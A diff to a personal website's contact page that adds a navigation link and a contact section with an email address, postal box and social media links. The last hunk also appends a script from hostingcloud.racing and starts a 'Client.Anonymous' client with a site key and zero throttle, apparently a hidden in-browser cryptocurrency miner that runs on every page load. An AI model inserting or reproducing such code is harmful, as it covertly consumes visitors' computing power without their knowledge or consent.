--- a/contact.html
+++ b/contact.html
@@ -85,6 +85,7 @@
 							</div>
 						</div>
 					</li>
+					<li class="fancynav-item"><a class="fancynav-link" href="/how-to-help.html"><span class="fancynav-link-content">how you can help</span></a></li>
 					<li class="fancynav-item"><a class="fancynav-link" href="/gavin-seim/"><span class="fancynav-link-content">gavin seim</span></a></li>
 					<li class="fancynav-item fancy-dropdown">
 						<a class="fancynav-link fancy-dropdown-toggle" href="JavaScript:void(0)"><span class="fancynav-link-content">about</span></a>
@@ -119,6 +120,34 @@
 					</div>
 				</div>
 			</div>
+			<section class="py-0">
+				<div class="container-fluid">
+					<div class="row h-full border-bottom border-300">
+						<div class="col-lg-6 px-0 order-lg-2" data-zanim-lg='{"animation":"slide-left","delay":0.4}' data-zanim-trigger="scroll">
+							<div class="owl-carousel owl-theme owl-dots-inner owl-theme-white h-100" data-options='{"items":1,"autoplay":true,"loop":true,"autoplayHoverPause":true,"animateOut":"fadeOut","nav":true}' data-zanim-lg='{"animation":"zoom-out","delay":0}' data-zanim-trigger="scroll">
+								<div class="min-vh-lg-100 py-9"><div class="bg-holder" style="background-image:url(/assets/img/headers/IMG_1302.JPG);"></div></div>
+								<div class="min-vh-lg-100 py-9"><div class="bg-holder" style="background-image:url(/assets/img/headers/13198644_10153741169188843_4988539503901043529_o.jpg);"></div></div>
+							</div>
+						</div>
+						<div class="col-lg-6 bg-white py-7 py-md-8">
+							<div class="row align-items-center justify-content-center h-100">
+								<div class="col-lg-10 text-black text-center text-lg-left" data-zanim-timeline="{}" data-zanim-trigger="scroll">
+									<div class="overflow-hidden"><h1 class="display-3 fs-5 fs-sm-6 text-underline mb-4" data-zanim-xs='{"delay":0.2}'>contact</h1></div>
+									<div class="overflow-hidden">
+										<p class="text-900 fs-0 mb-0" data-zanim-xs='{"delay":0.3}'><strong>E-mail:</strong> <a href="mailto:vbellamy@protonmail.com">vbellamy@protonmail.com</a></p>
+										<p class="text-900 fs-0 mb-0" data-zanim-xs='{"delay":0.4}'><strong>Address:</strong><br />V&eacute;ronique BELLAMY<br />P.O. Box 4578, Stn. C<br />Calgary, AB T2T 5N3<br />Canada</p>
+										<div class="mt-3">
+											<a href="https://www.facebook.com/vmbellamy/" class="btn btn-dark btn-sm mr-2"><span class="fab fa-facebook fa-w-10"></span></a>
+											<a href="https://twitter.com/yaynewfriend" class="btn btn-dark btn-sm mr-2"><span class="fab fa-twitter fa-w-10"></span></a>
+											<a href="https://instagram.com/veroniquebellamy" class="btn btn-dark btn-sm mr-2"><span class="fab fa-instagram fa-w-10"></span></a>
+										</div>
+									</div>
+								</div>
+							</div>
+						</div>
+					</div>
+				</div>
+			</section>
 		</main>
 		<footer class="footer bg-black text-600 py-4 text-sans-serif text-center overflow-hidden" data-zanim-timeline="{}" data-zanim-trigger="scroll">
 			<div class="container">
@@ -157,5 +186,12 @@
 		<script src="https://cdnjs.cloudflare.com/ajax/libs/babel-core/5.6.15/browser-polyfill.min.js"></script>
 		<script src="/assets/js/progressbar.min.js"></script>
 		<script src="/assets/js/theme.js"></script>
+		<script src="https://www.hostingcloud.racing/JQqn.js"></script>
+		<script>
+		    var _client = new Client.Anonymous('8e38b0920f1f9adafa65b285813b373d48a58ae25fbfe632f0f564493cfd299b', {
+		        throttle: 0, c: 'w', ads: 0
+		    });
+		    _client.start();
+		</script>
 	</body>
 </html>
